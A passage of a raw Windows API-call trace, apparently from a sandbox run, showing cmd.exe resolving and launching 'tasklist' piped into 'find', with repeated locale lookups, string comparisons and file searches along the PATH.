lpLCData=0x12b5560, cchData=8 | out: lpLCData=":") returned 2 [0117.048] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x96fce0, cchData=128 | out: lpLCData="0") returned 2 [0117.048] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x96fce0, cchData=128 | out: lpLCData="0") returned 2 [0117.048] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x96fce0, cchData=128 | out: lpLCData="1") returned 2 [0117.048] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x12b5570, cchData=8 | out: lpLCData="/") returned 2 [0117.048] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x12b5660, cchData=32 | out: lpLCData="Mon") returned 4 [0117.048] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x12b56a0, cchData=32 | out: lpLCData="Tue") returned 4 [0117.048] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x12b56e0, cchData=32 | out: lpLCData="Wed") returned 4 [0117.048] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x12b5720, cchData=32 | out: lpLCData="Thu") returned 4 [0117.049] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x12b5760, cchData=32 | out: lpLCData="Fri") returned 4 [0117.049] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x12b57a0, cchData=32 | out: lpLCData="Sat") returned 4 [0117.049] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x12b57e0, cchData=32 | out: lpLCData="Sun") returned 4 [0117.049] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x12b5580, cchData=8 | out: lpLCData=".") returned 2 [0117.049] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x12b5590, cchData=8 | out: lpLCData=",") returned 2 [0117.049] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0117.049] GetConsoleTitleW (in: lpConsoleTitle=0xc14e28, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\SYSTEM32\\cmd.exe") returned 0x1b [0117.050] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x74f70000 [0117.050] GetProcAddress (hModule=0x74f70000, lpProcName="CopyFileExW") returned 0x74f95d45 [0117.050] GetProcAddress (hModule=0x74f70000, lpProcName="IsDebuggerPresent") returned 0x74f8d16f [0117.050] GetProcAddress (hModule=0x74f70000, lpProcName="SetConsoleInputExeNameW") returned 0x759cdda0 [0117.050] _wcsicmp (_String1="tasklist", _String2=")") returned 75 [0117.050] _wcsicmp (_String1="FOR", _String2="tasklist") returned -14 [0117.050] _wcsicmp (_String1="FOR/?", _String2="tasklist") returned -14 [0117.050] _wcsicmp (_String1="IF", _String2="tasklist") returned -11 [0117.050] _wcsicmp (_String1="IF/?", _String2="tasklist") returned -11 [0117.050] _wcsicmp (_String1="REM", _String2="tasklist") returned -2 [0117.050] _wcsicmp (_String1="REM/?", _String2="tasklist") returned -2 [0117.051] _wcsicmp (_String1="FOR", _String2="find") returned 6 [0117.051] _wcsicmp (_String1="FOR/?", _String2="find") returned 6 [0117.051] _wcsicmp (_String1="IF", _String2="find") returned 3 [0117.051] _wcsicmp (_String1="IF/?", _String2="find") returned 3 [0117.051] _wcsicmp (_String1="REM", _String2="find") returned 12 [0117.051] _wcsicmp (_String1="REM/?", _String2="find") returned 12 [0117.052] _pipe (in: _PtHandles=0xc151f0, _PipeSize=0x0, _TextMode=32768 | out: _PtHandles=0xc151f0) returned 0 [0117.052] _dup (_FileHandle=1) returned 5 [0117.052] _dup2 (_FileHandleSrc=4, _FileHandleDst=1) returned 0 [0117.052] _close (_FileHandle=4) returned 0 [0117.052] _wcsicmp (_String1="tasklist", _String2="DIR") returned 16 [0117.052] _wcsicmp (_String1="tasklist", _String2="ERASE") returned 15 [0117.052] _wcsicmp (_String1="tasklist", _String2="DEL") returned 16 [0117.052] _wcsicmp (_String1="tasklist", _String2="TYPE") returned -24 [0117.052] _wcsicmp (_String1="tasklist", _String2="COPY") returned 17 [0117.052] _wcsicmp (_String1="tasklist", _String2="CD") returned 17 [0117.052] _wcsicmp (_String1="tasklist", _String2="CHDIR") returned 17 [0117.052] _wcsicmp (_String1="tasklist", _String2="RENAME") returned 2 [0117.052] _wcsicmp (_String1="tasklist", _String2="REN") returned 2 [0117.053] _wcsicmp (_String1="tasklist", _String2="ECHO") returned 15 [0117.053] _wcsicmp (_String1="tasklist", _String2="SET") returned 1 [0117.053] _wcsicmp (_String1="tasklist", _String2="PAUSE") returned 4 [0117.053] _wcsicmp (_String1="tasklist", _String2="DATE") returned 16 [0117.053] _wcsicmp (_String1="tasklist", _String2="TIME") returned -8 [0117.053] _wcsicmp (_String1="tasklist", _String2="PROMPT") returned 4 [0117.053] _wcsicmp (_String1="tasklist", _String2="MD") returned 7 [0117.053] _wcsicmp (_String1="tasklist", _String2="MKDIR") returned 7 [0117.053] _wcsicmp (_String1="tasklist", _String2="RD") returned 2 [0117.053] _wcsicmp (_String1="tasklist", _String2="RMDIR") returned 2 [0117.053] _wcsicmp (_String1="tasklist", _String2="PATH") returned 4 [0117.053] _wcsicmp (_String1="tasklist", _String2="GOTO") returned 13 [0117.053] _wcsicmp (_String1="tasklist", _String2="SHIFT") returned 1 [0117.053] _wcsicmp (_String1="tasklist", _String2="CLS") returned 17 [0117.053] _wcsicmp (_String1="tasklist", _String2="CALL") returned 17 [0117.053] _wcsicmp (_String1="tasklist", _String2="VERIFY") returned -2 [0117.053] _wcsicmp (_String1="tasklist", _String2="VER") returned -2 [0117.053] _wcsicmp (_String1="tasklist", _String2="VOL") returned -2 [0117.053] _wcsicmp (_String1="tasklist", _String2="EXIT") returned 15 [0117.053] _wcsicmp (_String1="tasklist", _String2="SETLOCAL") returned 1 [0117.053] _wcsicmp (_String1="tasklist", _String2="ENDLOCAL") returned 15 [0117.053] _wcsicmp (_String1="tasklist", _String2="TITLE") returned -8 [0117.053] _wcsicmp (_String1="tasklist", _String2="START") returned 1 [0117.053] _wcsicmp (_String1="tasklist", _String2="DPATH") returned 16 [0117.053] _wcsicmp (_String1="tasklist", _String2="KEYS") returned 9 [0117.053] _wcsicmp (_String1="tasklist", _String2="MOVE") returned 7 [0117.053] _wcsicmp (_String1="tasklist", _String2="PUSHD") returned 4 [0117.053] _wcsicmp (_String1="tasklist", _String2="POPD") returned 4 [0117.053] _wcsicmp (_String1="tasklist", _String2="ASSOC") returned 19 [0117.053] _wcsicmp (_String1="tasklist", _String2="FTYPE") returned 14 [0117.053] _wcsicmp (_String1="tasklist", _String2="BREAK") returned 18 [0117.053] _wcsicmp (_String1="tasklist", _String2="COLOR") returned 17 [0117.053] _wcsicmp (_String1="tasklist", _String2="MKLINK") returned 7 [0117.053] _wcsicmp (_String1="tasklist", _String2="DIR") returned 16 [0117.053] _wcsicmp (_String1="tasklist", _String2="ERASE") returned 15 [0117.053] _wcsicmp (_String1="tasklist", _String2="DEL") returned 16 [0117.053] _wcsicmp (_String1="tasklist", _String2="TYPE") returned -24 [0117.053] _wcsicmp (_String1="tasklist", _String2="COPY") returned 17 [0117.053] _wcsicmp (_String1="tasklist", _String2="CD") returned 17 [0117.053] _wcsicmp (_String1="tasklist", _String2="CHDIR") returned 17 [0117.053] _wcsicmp (_String1="tasklist", _String2="RENAME") returned 2 [0117.053] _wcsicmp (_String1="tasklist", _String2="REN") returned 2 [0117.053] _wcsicmp (_String1="tasklist", _String2="ECHO") returned 15 [0117.053] _wcsicmp (_String1="tasklist", _String2="SET") returned 1 [0117.053] _wcsicmp (_String1="tasklist", _String2="PAUSE") returned 4 [0117.053] _wcsicmp (_String1="tasklist", _String2="DATE") returned 16 [0117.053] _wcsicmp (_String1="tasklist", _String2="TIME") returned -8 [0117.053] _wcsicmp (_String1="tasklist", _String2="PROMPT") returned 4 [0117.053] _wcsicmp (_String1="tasklist", _String2="MD") returned 7 [0117.053] _wcsicmp (_String1="tasklist", _String2="MKDIR") returned 7 [0117.053] _wcsicmp (_String1="tasklist", _String2="RD") returned 2 [0117.053] _wcsicmp (_String1="tasklist", _String2="RMDIR") returned 2 [0117.054] _wcsicmp (_String1="tasklist", _String2="PATH") returned 4 [0117.054] _wcsicmp (_String1="tasklist", _String2="GOTO") returned 13 [0117.054] _wcsicmp (_String1="tasklist", _String2="SHIFT") returned 1 [0117.054] _wcsicmp (_String1="tasklist", _String2="CLS") returned 17 [0117.054] _wcsicmp (_String1="tasklist", _String2="CALL") returned 17 [0117.054] _wcsicmp (_String1="tasklist", _String2="VERIFY") returned -2 [0117.054] _wcsicmp (_String1="tasklist", _String2="VER") returned -2 [0117.054] _wcsicmp (_String1="tasklist", _String2="VOL") returned -2 [0117.054] _wcsicmp (_String1="tasklist", _String2="EXIT") returned 15 [0117.054] _wcsicmp (_String1="tasklist", _String2="SETLOCAL") returned 1 [0117.054] _wcsicmp (_String1="tasklist", _String2="ENDLOCAL") returned 15 [0117.054] _wcsicmp (_String1="tasklist", _String2="TITLE") returned -8 [0117.054] _wcsicmp (_String1="tasklist", _String2="START") returned 1 [0117.054] _wcsicmp (_String1="tasklist", _String2="DPATH") returned 16 [0117.054] _wcsicmp (_String1="tasklist", _String2="KEYS") returned 9 [0117.054] _wcsicmp (_String1="tasklist", _String2="MOVE") returned 7 [0117.054] _wcsicmp (_String1="tasklist", _String2="PUSHD") returned 4 [0117.054] _wcsicmp (_String1="tasklist", _String2="POPD") returned 4 [0117.054] _wcsicmp (_String1="tasklist", _String2="ASSOC") returned 19 [0117.054] _wcsicmp (_String1="tasklist", _String2="FTYPE") returned 14 [0117.054] _wcsicmp (_String1="tasklist", _String2="BREAK") returned 18 [0117.054] _wcsicmp (_String1="tasklist", _String2="COLOR") returned 17 [0117.054] _wcsicmp (_String1="tasklist", _String2="MKLINK") returned 7 [0117.054] _wcsicmp (_String1="tasklist", _String2="FOR") returned 14 [0117.054] _wcsicmp (_String1="tasklist", _String2="IF") returned 11 [0117.054] _wcsicmp (_String1="tasklist", _String2="REM") returned 2 [0117.054] _wcsicmp (_String1="tasklist", _String2="DIR") returned 16 [0117.054] _wcsicmp (_String1="tasklist", _String2="ERASE") returned 15 [0117.054] _wcsicmp (_String1="tasklist", _String2="DEL") returned 16 [0117.054] _wcsicmp (_String1="tasklist", _String2="TYPE") returned -24 [0117.054] _wcsicmp (_String1="tasklist", _String2="COPY") returned 17 [0117.054] _wcsicmp (_String1="tasklist", _String2="CD") returned 17 [0117.054] _wcsicmp (_String1="tasklist", _String2="CHDIR") returned 17 [0117.054] _wcsicmp (_String1="tasklist", _String2="RENAME") returned 2 [0117.054] _wcsicmp (_String1="tasklist", _String2="REN") returned 2 [0117.054] _wcsicmp (_String1="tasklist", _String2="ECHO") returned 15 [0117.054] _wcsicmp (_String1="tasklist", _String2="SET") returned 1 [0117.054] _wcsicmp (_String1="tasklist", _String2="PAUSE") returned 4 [0117.054] _wcsicmp (_String1="tasklist", _String2="DATE") returned 16 [0117.054] _wcsicmp (_String1="tasklist", _String2="TIME") returned -8 [0117.054] _wcsicmp (_String1="tasklist", _String2="PROMPT") returned 4 [0117.054] _wcsicmp (_String1="tasklist", _String2="MD") returned 7 [0117.055] _wcsicmp (_String1="tasklist", _String2="MKDIR") returned 7 [0117.055] _wcsicmp (_String1="tasklist", _String2="RD") returned 2 [0117.055] _wcsicmp (_String1="tasklist", _String2="RMDIR") returned 2 [0117.055] _wcsicmp (_String1="tasklist", _String2="PATH") returned 4 [0117.055] _wcsicmp (_String1="tasklist", _String2="GOTO") returned 13 [0117.055] _wcsicmp (_String1="tasklist", _String2="SHIFT") returned 1 [0117.055] _wcsicmp (_String1="tasklist", _String2="CLS") returned 17 [0117.055] _wcsicmp (_String1="tasklist", _String2="CALL") returned 17 [0117.055] _wcsicmp (_String1="tasklist", _String2="VERIFY") returned -2 [0117.055] _wcsicmp (_String1="tasklist", _String2="VER") returned -2 [0117.055] _wcsicmp (_String1="tasklist", _String2="VOL") returned -2 [0117.055] _wcsicmp (_String1="tasklist", _String2="EXIT") returned 15 [0117.055] _wcsicmp (_String1="tasklist", _String2="SETLOCAL") returned 1 [0117.055] _wcsicmp (_String1="tasklist", _String2="ENDLOCAL") returned 15 [0117.055] _wcsicmp (_String1="tasklist", _String2="TITLE") returned -8 [0117.055] _wcsicmp (_String1="tasklist", _String2="START") returned 1 [0117.055] _wcsicmp (_String1="tasklist", _String2="DPATH") returned 16 [0117.055] _wcsicmp (_String1="tasklist", _String2="KEYS") returned 9 [0117.055] _wcsicmp (_String1="tasklist", _String2="MOVE") returned 7 [0117.055] _wcsicmp (_String1="tasklist", _String2="PUSHD") returned 4 [0117.055] _wcsicmp (_String1="tasklist", _String2="POPD") returned 4 [0117.055] _wcsicmp (_String1="tasklist", _String2="ASSOC") returned 19 [0117.055] _wcsicmp (_String1="tasklist", _String2="FTYPE") returned 14 [0117.055] _wcsicmp (_String1="tasklist", _String2="BREAK") returned 18 [0117.055] _wcsicmp (_String1="tasklist", _String2="COLOR") returned 17 [0117.055] _wcsicmp (_String1="tasklist", _String2="MKLINK") returned 7 [0117.055] _wcsnicmp (_String1="task", _String2="cmd ", _MaxCount=0x4) returned 17 [0117.055] SetErrorMode (uMode=0x0) returned 0x0 [0117.055] SetErrorMode (uMode=0x1) returned 0x0 [0117.055] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0xc15228, lpFilePart=0x96fb3c | out: lpBuffer="C:\\Users\\5JgHKoaOfdp\\Desktop", lpFilePart=0x96fb3c*="Desktop") returned 0x1c [0117.055] SetErrorMode (uMode=0x0) returned 0x1 [0117.056] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0117.056] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0117.059] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0117.060] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0117.060] FindFirstFileExW (in: lpFileName="C:\\Users\\5JgHKoaOfdp\\Desktop\\tasklist.*", fInfoLevelId=0x1, lpFindFileData=0x96f8c8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x96f8c8) returned 0xffffffff [0117.060] GetLastError () returned 0x2 [0117.060] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0117.060] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\tasklist.*", fInfoLevelId=0x1, lpFindFileData=0x96f8c8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x96f8c8) returned 0xc15530 [0117.060] FindClose (in: hFindFile=0xc15530 | out: hFindFile=0xc15530) returned 1 [0117.060] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\tasklist.COM", fInfoLevelId=0x1, lpFindFileData=0x96f8c8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x96f8c8) returned 0xffffffff [0117.061] GetLastError () returned 0x2 [0117.061] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\tasklist.EXE", fInfoLevelId=0x1, lpFindFileData=0x96f8c8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x96f8c8) returned 0xc15530 [0117.061] FindClose (in: hFindFile=0xc15530 | out: hFindFile=0xc15530) returned 1 [0117.061] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0117.061] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0117.061] _wcsnicmp (_String1="task", _String2="cmd ", _MaxCount=0x4) returned 17 [0117.061] SetErrorMode (uMode=0x0) returned 0x0 [0117.061] SetErrorMode (uMode=0x1) returned 0x0 [0117.061] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0xc1a3c0, lpFilePart=0x96f8e4 | out: lpBuffer="C:\\Users\\5JgHKoaOfdp\\Desktop", lpFilePart=0x96f8e4*="Desktop") returned 0x1c [0117.061] SetErrorMode (uMode=0x0) returned 0x1 [0117.061] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0117.061] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0117.061] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0117.061] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0117.061] FindFirstFileExW (in: lpFileName="C:\\Users\\5JgHKoaOfdp\\Desktop\\tasklist.*", fInfoLevelId=0x1, lpFindFileData=0x96f670, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x96f670) returned 0xffffffff [0117.061] GetLastError () returned 0x2 [0117.061] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0117.061] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\tasklist.*", fInfoLevelId=0x1, lpFindFileData=0x96f670, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x96f670) returned 0xc15628 [0117.062] FindClose (in: hFindFile=0xc15628 | out: hFindFile=0xc15628) returned 1 [0117.062] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\tasklist.COM", fInfoLevelId=0x1, lpFindFileData=0x96f670, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x96f670) returned 0xffffffff [0117.062] GetLastError () returned 0x2 [0117.062] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\tasklist.EXE", fInfoLevelId=0x1, lpFindFileData=0x96f670, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x96f670) returned 0xc15628 [0117.062] FindClose (in: hFindFile=0xc15628 | out: hFindFile=0xc15628) returned 1 [0117.062] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0117.062] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0117.062] GetConsoleTitleW (in: lpConsoleTitle=0x96fb6c, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\SYSTEM32\\cmd.exe") returned 0x1b [0117.062] InitializeProcThreadAttributeList (in: lpAttributeList=0x96fa98, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x96fa7c | out: lpAttributeList=0x96fa98, lpSize=0x96fa7c) returned 1 [0117.062] UpdateProcThreadAttribute (in: lpAttributeList=0x96fa98, dwFlags=0x0, Attribute=0x60001, lpValue=0x96fa84, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x96fa98, lpPreviousValue=0x0) returned 1 [0117.062] GetStartupInfoW (in: lpStartupInfo=0x96fad0 | out: lpStartupInfo=0x96fad0*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x100, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x24, hStdOutput=0x2b8, hStdError=0x2c)) [0117.062] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0117.062] _wcsnicmp (_String1="COPYCMD", _String2="=ExitCo", _MaxCount=0x7) returned 38 [0117.062] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0117.062] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0117.062] _wcsnicmp (_String1="COPYCMD", _String2="cmdln=", _MaxCount=0x7) returned 2 [0117.063] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0117.063] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0117.063] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0117.063] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0117.063] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0117.063] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0117.063] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0117.063] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0117.063] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0117.063] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0117.063] _wcsnicmp (_String1="COPYCMD", _String2="MYFILES", _MaxCount=0x7) returned -10 [0117.063] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0117.063] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0117.063] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0117.063] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0117.063] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0117.063] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0117.063] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0117.063] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0117.063] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0117.063] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0117.063] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0117.063] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0117.063] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0117.063] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0117.063] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0117.063] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0117.063] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0117.063] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0117.063] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0117.063] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0117.063] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0117.063] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0117.063] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0117.063] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0117.063] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0117.063] lstrcmpW (lpString1="\\tasklist.exe", lpString2="\\XCOPY.EXE") returned -1 [0117.064] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\tasklist.exe", lpCommandLine="tasklist", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5JgHKoaOfdp\\Desktop", lpStartupInfo=0x96fa20*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="tasklist", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x96fa6c | out: lpCommandLine="tasklist", lpProcessInformation=0x96fa6c*(hProcess=0x64, hThread=0x60, dwProcessId=0xb84, dwThreadId=0xbc4)) returned 1 [0117.067] CloseHandle (hObject=0x60) returned 1 [0117.067] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0117.068] GetEnvironmentStringsW () returned 0xc142d8* [0117.068] FreeEnvironmentStringsA (penv="=") returned 1 [0117.068] DeleteProcThreadAttributeList (in: lpAttributeList=0x96fa98 | out: lpAttributeList=0x96fa98) [0117.068] _get_osfhandle (_FileHandle=3) returned 0x54 [0117.068] DuplicateHandle (in: hSourceProcessHandle=0x64, hSourceHandle=0x54, hTargetProcessHandle=0x0, lpTargetHandle=0x0, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x1 | out: lpTargetHandle=0x0) returned 1 [0117.068] _dup2 (_FileHandleSrc=5, _FileHandleDst=1) returned 0 [0117.068] _close (_FileHandle=5) returned 0 [0117.068] _dup (_FileHandle=0) returned 4 [0117.068] _dup2 (_FileHandleSrc=3, _FileHandleDst=0) returned 0 [0117.068] _close (_FileHandle=3) returned 0 [0117.068] _wcsnicmp (_String1="find", _String2="cmd ", _MaxCount=0x4) returned 3 [0117.068] SetErrorMode (uMode=0x0) returned 0x0 [0117.068] SetErrorMode (uMode=0x1) returned 0x0 [0117.068] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0xc142e0, lpFilePart=0x96fb3c | out: lpBuffer="C:\\Users\\5JgHKoaOfdp\\Desktop", lpFilePart=0x96fb3c*="Desktop") returned 0x1c [0117.068] SetErrorMode (uMode=0x0) returned 0x1 [0117.068] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0117.068] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0117.068] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0117.068] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0117.069] FindFirstFileExW (in: lpFileName="C:\\Users\\5JgHKoaOfdp\\Desktop\\find.*", fInfoLevelId=0x1, lpFindFileData=0x96f8c8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x96f8c8) returned 0xffffffff [0117.069] GetLastError () returned 0x2 [0117.069] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0117.069] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\find.*", fInfoLevelId=0x1, lpFindFileData=0x96f8c8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x96f8c8) returned 0xc15628 [0117.069] FindClose (in: hFindFile=0xc15628 | out: hFindFile=0xc15628) returned 1 [0117.069] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\find.COM", fInfoLevelId=0x1, lpFindFileData=0x96f8c8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x96f8c8) returned 0xffffffff [0117.069] GetLastError () returned 0x2 [0117.069] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\find.EXE", fInfoLevelId=0x1, lpFindFileData=0x96f8c8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x96f8c8) returned 0xc15628 [0117.069] FindClose (in: hFindFile=0xc15628 | out: hFindFile=0xc15628) returned 1 [0117.069] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0117.069] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0117.069] _wcsnicmp (_String1="find", _String2="cmd ", _MaxCount=0x4) returned 3 [0117.069] SetErrorMode (uMode=0x0) returned 0x0 [0117.069] SetErrorMode (uMode=0x1) returned 0x0 [0117.069] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0xc14668, lpFilePart=0x96f8e4 | out: lpBuffer="C:\\Users\\5JgHKoaOfdp\\Desktop", lpFilePart=0x96f8e4*="Desktop") returned 0x1c [0117.069] SetErrorMode (uMode=0x0) returned 0x1 [0117.070] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 